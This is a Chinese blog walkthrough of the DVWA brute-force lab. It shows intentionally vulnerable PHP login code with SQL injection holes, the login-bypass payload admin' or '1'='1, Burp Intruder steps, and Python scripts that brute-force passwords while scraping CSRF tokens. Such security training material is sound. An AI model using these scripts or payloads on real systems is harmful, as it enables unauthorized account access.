Brute Force

最新推荐文章于 2021-09-11 10:44:00 发布
最新推荐文章于 2021-09-11 10:44:00 发布
阅读量280 收藏
点赞数
分类专栏: DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/angry_program/article/details/104168747
版权

前言

Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法(枚举法)猜解出用户口令,是现在最为广泛使用的攻击手法之一,如2014年轰动全国的12306“撞库”事件,实质就是暴力破解攻击。

下面对四种不同等级的Brute Force进行分析:

 

  • Low

服务器端核心代码:

<?php

if( isset( $_GET[ 'Login' ] ) ) {
	// Get username
	$user = $_GET[ 'username' ];

	// Get password
	$pass = $_GET[ 'password' ];
	$pass = md5( $pass );

	// Check the database
	$query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

	if( $result && mysqli_num_rows( $result ) == 1 ) {
		// Get users details
		$row    = mysqli_fetch_assoc( $result );
		$avatar = $row["avatar"];

		// Login successful
		$html .= "<p>Welcome to the password protected area {$user}</p>";
		$html .= "<img src=\"{$avatar}\" />";
	}
	else {
		// Login failed
		$html .= "<pre><br />Username and/or password incorrect.</pre>";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

可以看到, 服务端只是通过 isset( $_GET[ 'Login' ]) 来判断 Login登录是否被设置; 也没有任何的防爆破机制,且对参数username、password没有做任何过滤,存在明显的sql注入漏洞。

漏洞利用

方法一:  工具爆破

首先可以利用burpsuite的intruder模块进行爆破:

第一步抓包, 然后Ctrl+I应用到intruder模块:

第二步设置爆破参数, 

因为要对password进行枚举, 所以只在password参数两边加$符:

设置好进程数:

值得一提的是,  还要设置好端口为80, 楼主之前设置错导致无法正常爆破:

第三步加载字典:

最后, start attack,  在结果中, 看到返回的长度不同的那个即为登录密码:

也可以用 hydra 工具进行爆破, 具体参考:  爆破工具 Hydra 简单使用

 

方法二:  sql注入

在用户名中注入单引号, 发现注入点:

于是可以在用户名处注入语句:

admin' or '1'='1

且密码为空, 注入成功: 

 

  • Medium

服务端核心代码:

<?php

if( isset( $_GET[ 'Login' ] ) ) {
	// Sanitise username input
	$user = $_GET[ 'username' ];
	$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

	// Sanitise password input
	$pass = $_GET[ 'password' ];
	$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$pass = md5( $pass );

	// Check the database
	$query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

	if( $result && mysqli_num_rows( $result ) == 1 ) {
		// Get users details
		$row    = mysqli_fetch_assoc( $result );
		$avatar = $row["avatar"];

		// Login successful
		$html .= "<p>Welcome to the password protected area {$user}</p>";
		$html .= "<img src=\"{$avatar}\" />";
	}
	else {
		// Login failed
		sleep( 2 );
		$html .= "<pre><br />Username and/or password incorrect.</pre>";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

相比Low级别的代码,Medium级别的代码主要增加了mysql_real_escape_string函数,这个函数会对字符串中的特殊符号(x00,n,r,,’,”,x1a)进行转义,基本上能够抵御sql注入攻击,说基本上是因为查到说 MySQL5.5.37以下版本如果设置编码为GBK,能够构造编码绕过mysql_real_escape_string 对单引号的转义(因实验环境的MySQL版本较新,所以并未做相应验证);同时,$pass做了MD5校验,杜绝了通过参数password进行sql注入的可能性。但是,依然没有加入有效的防爆破机制(登录错误的sleep(2)实在算不上)。

漏洞利用

虽然sql注入不再有效,但依然可以使用Burpsuite进行爆破,与Low级别的爆破方法基本一样,这里就不赘述了。

 

  • High

服务端核心代码:

<?php

if( isset( $_GET[ 'Login' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Sanitise username input
	$user = $_GET[ 'username' ];
	$user = stripslashes( $user );
	$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

	// Sanitise password input
	$pass = $_GET[ 'password' ];
	$pass = stripslashes( $pass );
	$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$pass = md5( $pass );

	// Check database
	$query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

	if( $result && mysqli_num_rows( $result ) == 1 ) {
		// Get users details
		$row    = mysqli_fetch_assoc( $result );
		$avatar = $row["avatar"];

		// Login successful
		$html .= "<p>Welcome to the password protected area {$user}</p>";
		$html .= "<img src=\"{$avatar}\" />";
	}
	else {
		// Login failed
		sleep( rand( 0, 3 ) );
		$html .= "<pre><br />Username and/or password incorrect.</pre>";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

High级别的代码加入了Token,可以抵御CSRF攻击,同时也增加了爆破的难度,通过抓包,可以看到,登录验证时提交了四个参数:username、password、Login以及user_token。

每次服务器返回的登陆页面中都会包含一个随机的user_token的值,用户每次登录时都要将user_token一起提交。服务器收到请求后,会优先做token的检查,再进行sql查询。

同时,High级别的代码中,使用了stripslashes(去除字符串中的反斜线字符,如果有两个连续的反斜线,则只去掉一个)、 mysql_real_escape_string对参数username、password进行过滤、转义,进一步抵御sql注入。

漏洞利用

由于加入了Anti-CSRFtoken预防无脑爆破,这里就不推荐用Burpsuite了,还是简单用python写个脚本吧。

存在user_token时的登录流程为:

下面是作者写的一个脚本(python3 ),用户名为admin,对password参数进行爆破并打印结果,仅供各位参考。

from bs4 import BeautifulSoup
import urllib3

header={  
		'Host': '127.0.0.1',
		'Cache-Control': 'max-age=0',
		'If-None-Match': "307-52156c6a290c0",
		'If-Modified-Since': 'Mon, 05 Oct 2015 07:51:07 GMT',
		'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36',
		'Accept': '*/*',
		'Referer': 'http://127.0.0.1/DVWA/vulnerabilities/brute/index.php',
		'Accept-Encoding': 'gzip, deflate, sdch',
		'Accept-Language': 'zh-CN,zh;q=0.8',
		'Cookie': 'security=high; PHPSESSID=5re92j36t4f2k1gvnqdf958bi2'
	}

url = "http://127.0.0.1/DVWA/vulnerabilities/brute/index.php"


def get_token(requrl,header):
    http = urllib3.PoolManager() # 创建连接池对象
    response = http.request('GET', url=requrl,headers=header)
    data = response.data
    print('\t', len(data))
    soup = BeautifulSoup(data,"html.parser")
    user_token = soup.select('form[action] > input[name]')[0].get('value') # get user_token
    return user_token

user_token = get_token(url,header)
i = 0

for line in open("./passwd.txt"):
	requrl = "http://127.0.0.1/DVWA/vulnerabilities/brute/index.php"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
	i += 1
	print (i, '\tadmin\t', line.strip(), end='\t')
	user_token = get_token(requrl,header)
	if (i == 10):
		break

测试的时候,  发现长度都是一样的........

Debug了半天,  发现网页没有登录....巨坑!!!

于是在代码上加上登录, 最后完整代码:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @File  : brute_force.py
# @Author: ShenHao
# @Contact : 1427662743@qq.com 
# @Date  : 20-2-4下午4:26
# @Desc  : 脚本爆破带token的web网站

from bs4 import BeautifulSoup
import requests


header = {
    'Host': '127.0.0.1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://127.0.0.1/DVWA/vulnerabilities/brute/',
    'Cookie': 'security=high; PHPSESSID=lksl77ja4uiqqogplk4fl1po6u',
    'DNT': '1',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

login_header = {
    'Host': '127.0.0.1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Cookie': 'security=high; PHPSESSID=lksl77ja4uiqqogplk4fl1po6u',
    'DNT': '1',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

url = "http://127.0.0.1/DVWA/vulnerabilities/brute/index.php"
login_url = r'http://127.0.0.1/DVWA/login.php'


# 获取主界面的token
def get_login_token(requrl, header):
    response = requests.get(url=requrl, headers=header)
    data = response.text
    # print('\t', len(data))
    soup = BeautifulSoup(data, "html.parser")
    user_token = soup.select('form[action] > input[name]')[0].get('value')  # get the user_token
    return user_token


# 获取爆破界面的token
def get_target_token(requrl, header):
    response = requests.get(url=requrl, headers=header)
    data = response.text
    print('\t', len(data))
    # print(data)
    soup = BeautifulSoup(data, "html.parser")
    # user_token = soup.select('form[action] > input[type]')  # get the user_token
    user_token = soup.find_all('input')[3].get('value')  # get the user_token
    # print(user_token)
    return user_token


# 先登录主界面
login_token = get_login_token(login_url, login_header)
requests.post(url=login_url,
              headers=login_header,
              data={'username': 'admin', 'password': 'password', 'Login': 'Login', 'user_token': login_token})

# 进入目标界面
user_token = get_target_token(url, header)
i = 0
for line in open("/home/meta/Desktop/passwd.txt"):
    requrl = "http://127.0.0.1/DVWA/vulnerabilities/brute/index.php" + "?username=admin&password=" + line.strip() + "&Login=Login&user_token=" + user_token
    print(i, '\tadmin\t', line.strip(), end='\t')
    user_token = get_target_token(requrl, header)
    i += 1

print('Task Done!')

 

  • Impossible

服务端核心代码:

<?php

if( isset( $_POST[ 'Login' ] ) && isset ($_POST['username']) && isset ($_POST['password']) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Sanitise username input
	$user = $_POST[ 'username' ];
	$user = stripslashes( $user );
	$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

	// Sanitise password input
	$pass = $_POST[ 'password' ];
	$pass = stripslashes( $pass );
	$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$pass = md5( $pass );

	// Default values
	$total_failed_login = 3;
	$lockout_time       = 15;
	$account_locked     = false;

	// Check the database (Check user information)
	$data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
	$data->bindParam( ':user', $user, PDO::PARAM_STR );
	$data->execute();
	$row = $data->fetch();

	// Check to see if the user has been locked out.
	if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {
		// User locked out.  Note, using this method would allow for user enumeration!
		//$html .= "<pre><br />This account has been locked due to too many incorrect logins.</pre>";

		// Calculate when the user would be allowed to login again
		$last_login = strtotime( $row[ 'last_login' ] );
		$timeout    = $last_login + ($lockout_time * 60);
		$timenow    = time();

		/*
		print "The last login was: " . date ("h:i:s", $last_login) . "<br />";
		print "The timenow is: " . date ("h:i:s", $timenow) . "<br />";
		print "The timeout is: " . date ("h:i:s", $timeout) . "<br />";
		*/

		// Check to see if enough time has passed, if it hasn't locked the account
		if( $timenow < $timeout ) {
			$account_locked = true;
			// print "The account is locked<br />";
		}
	}

	// Check the database (if username matches the password)
	$data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
	$data->bindParam( ':user', $user, PDO::PARAM_STR);
	$data->bindParam( ':password', $pass, PDO::PARAM_STR );
	$data->execute();
	$row = $data->fetch();

	// If its a valid login...
	if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
		// Get users details
		$avatar       = $row[ 'avatar' ];
		$failed_login = $row[ 'failed_login' ];
		$last_login   = $row[ 'last_login' ];

		// Login successful
		$html .= "<p>Welcome to the password protected area <em>{$user}</em></p>";
		$html .= "<img src=\"{$avatar}\" />";

		// Had the account been locked out since last login?
		if( $failed_login >= $total_failed_login ) {
			$html .= "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";
			$html .= "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";
		}

		// Reset bad login count
		$data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
		$data->bindParam( ':user', $user, PDO::PARAM_STR );
		$data->execute();
	} else {
		// Login failed
		sleep( rand( 2, 4 ) );

		// Give the user some feedback
		$html .= "<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";

		// Update bad login count
		$data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
		$data->bindParam( ':user', $user, PDO::PARAM_STR );
		$data->execute();
	}

	// Set the last login time
	$data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
	$data->bindParam( ':user', $user, PDO::PARAM_STR );
	$data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

可以看到Impossible级别的代码加入了可靠的防爆破机制,当检测到频繁的错误登录后,系统会将账户锁定,爆破也就无法继续。

同时采用了更为安全的PDO(PHP Data Object)机制防御sql注入,这是因为不能使用PDO扩展本身执行任何数据库操作,而sql注入的关键就是通过破坏sql语句结构执行恶意的sql命令。参考: PHP学习笔记之PDO

 

  • 参考文章

https://www.freebuf.com/articles/web/116437.html

 

angry_program
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Dvwa练习06 SQL注入(Low)
coco3105的博客
02-19 1147
等级low分别用了手工和sqlmap注入,medium没实践,high采用的是旧版本,没过滤参数。
DVWA关卡1:Brute Force(暴力破解)
m0_54899775的博客
12-06 831
暴力破解:通过利用大量猜测和穷举的方式来尝试获取用户口令的攻击方式。就是猜口令咯,攻击者一直枚举进行请求,通过对比数据包的长度可以很好的判断是否爆破成功,因为爆破成功和失败的长度是不一样的,所以可以很好的判断是否爆破成功。 LOW 源码: <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'pas..
Dvwa Brute force 里面陌生函数及解题
smileprint的博客
09-07 120
Dvwa Brute force 里面陌生函数及解题 result=mysqliquery(result = mysqli_query(result=mysqliq​uery(GLOBALS["___mysqli_ston"], query)ordie(′<pre>′.((isobject(query ) or die( '<pre>' . ((is_object(query)ordie(′<pre>′.((iso​bject(GLOBALS["___mysqli_st
[理论-学习]Web安全原理剖析-02
3hex的博客
09-11 299
声明: 由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。 笔记内容来源于各类网课、书籍。 本章节内容来源:《Web安全攻防渗透测试实战指南》 三、XSS 1. XSS基础 1.1 XSS漏洞介绍 跨站脚本(Cross-Site Scripting,检测为XSS或跨站脚本或跨站脚本攻击),是一种针对网页应用程序的安全漏洞攻击技术,是代码注入的一种。 它允许恶意用户将脚本代码注入网页中,其他用户在浏览网页会受到影响。恶意用户利用XSS攻击成功后,可能会进行高权限的操作.
SQL Injection
angry_program的博客
02-07 241
前言 SQL注入(SQL Injection),是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。据说黑客依靠的就是常见的SQL注入漏洞。 SQL注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面简要介绍手工注入(非盲...
Facebook的BruteForce
02-18
Facebook的BruteForce Bruteforce attack for Facebook Account 安装要求(Linux) >> apt-get install git python3 python3-pip python python-pip 一对一运行命令 >> git clone ...
bruteforce
03-22
bruteforce
bruteforce-bitcoin-brainwallet-master_bruteforce_源码
10-02
brainwallet brute force python
bruteForce:暴力破解各种服务的工具
04-13
蛮力 ━━┓━━━━━━━━━━━━━━━━━━━━━━━━┓━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ━━┓━━━━━┃┗━━┓┏━━┓┏━...
Brute Force - Grass Shader 1.7
05-20
unitypackage 草地shader
DVWA通关教程(上)
qq_50854662的博客
05-22 1万+
简介: DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的web漏洞如sql注入,xss,密码破解等常见漏洞。本教程将以DVWA为例,演示常见的web漏洞的利用和攻击。 登录创建数据库(账号为admin,密码为password) 登录后界面 在dvwa security选项中,可以调整dvwa的难易程度, Brute Force(暴力破解) Brute Force即为暴力破解,通过枚举获取管理员的账号和密码,在实际的操作中,一般用来破解后台管理系统的登录。
dvwa之sql注入学习(不同级别)
热门推荐
过客璇璇的博客
03-24 4万+
dvwa之sql注入学习(不同级别) 级别:Low 从页面上看到,有一个可以提交查询内容的地方 我们可以通过以下步骤判断这里是否存在注入点 ① 输入1 提交 ②输入1' 提交 ③输入1 and 1=1提交 ④输入1 and 1=2提交 由上可以看出是存在注入点的, 我们猜测sql查询语句是这样的: select First name的列名 a...
网络安全-靶机dvwa之sql注入Low到High详解(含代码分析)
关注网络安全、云原生安全
10-11 2万+
目录 SQL Injection-LOW Union注入 注入点判断 字段判断 获取数据库名 获取表名 获取列名 获取数据 Error注入 获取表名 获取列名 获取数据 源码解析 主要步骤 漏洞原因 SQL Injection-MIDDLE SQL Injection-HIGH SQL Injection(Blind)-LOW Boolean盲注 获取数据库名 sqlmap 获取数据库名 获取表名 获取列名 获取数据 SQL Injection(Blin.
1-Web安全——浅谈暴力破解
网络安全
09-10 1336
1. 暴力破解攻击 暴力破解是一种针对密码破译的测试方法,简单来说就是在不知道用户名或密码的情况下,通过穷举法将密码逐个推算比较,直到找到真正的密码为止。这是最原始,粗暴的破解方式,根据运算能力,破解密码是非常耗时的。 攻击者在进行渗透测试时,刚开始可能不会直接采取暴力破解方式,一般攻击者可能对该程序“没办法”的时候才会采取这种手段。 2. C/S架构暴力破解 所谓C/S架构就是开发中经常提到的客户端与服务端架构,常用的ssh,sql server,mysql等服务会提供一个高权限的管理..
DVWA 之 Brute Force
weixin_51167520的博客
03-06 639
DVWA 之 Brute Force 实验环境:Win7 win2k8 Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令 ** Low 级 ** 首先在WIN7上把安全级别改成LOW 打开WIN7访问http:192.168.60.22:81暴力破解: 漏洞利用 方法一、爆破利用 burpsuite 即可完成 输入错误的用户名和密码: 抓取流量后,发送到 Intruder 模块来进行爆破,在 Position 中的 Attack type 选择 cl
Algorithm学习笔记 --- brute force算法(暴力算法)
杨鑫newlife的专栏
10-21 2万+
Algorithm学习笔记 --- brute force算法(暴力算法)
DOM Based Cross Site Scripting (XSS)
angry_program的博客
02-09 2773
前言 DOM(document object model文档对象模型),客户端脚本处理逻辑导致的安全问题。基于DOM的XSS漏洞是指受害者端的网页脚本在修改本地页面DOM环境时未进行合理的处置,而使得攻击脚本被执行。在整个攻击过程中,服务器响应的页面并没有发生变化,引起客户端脚本执行结果差异的原因是对本地DOM的恶意篡改利用。DOM型的XSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的...
Reflected Cross Site Scripting (XSS)
angry_program的博客
02-10 2549
前言 反射型XSS, 即 Reflected Cross Site Scripting (XSS),攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的 页面和内容),一般容易出现在搜索页面。 下面对四种不同等级的反射型XSS漏洞进行分析: Low 服务端核心代码: <?php header ("X-XSS-Prot...
Stored Cross Site Scripting (XSS)
angry_program的博客
02-10 1317
前言 存储型XSS, 即Stored Cross Site Scripting (XSS), 也可以称为持久性的XSS, 顾名思义就是恶意代码存储在服务器或者数据库中, 恶意代码一般伴随着用户的评论发表、个人信息或者文章发表的地方, 如果没有过滤或者过滤不严格, 这些代码将会被存储在服务器中, 每当用户访问的时候, 恶意代码都会被触发, 造成大量cookie泄露, 甚至蠕虫。 下面对四种...
dvwa通关brute force
最新发布
06-08
在DVWA中,Brute Force挑战是关于用户登录部分的一个环节,主要是测试用户的密码暴力破解能力。 当你遇到Brute Force关卡时,目标是尝试使用各种可能的用户名和密码组合,直到找到正确的登录凭证。这通常涉及到编写...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值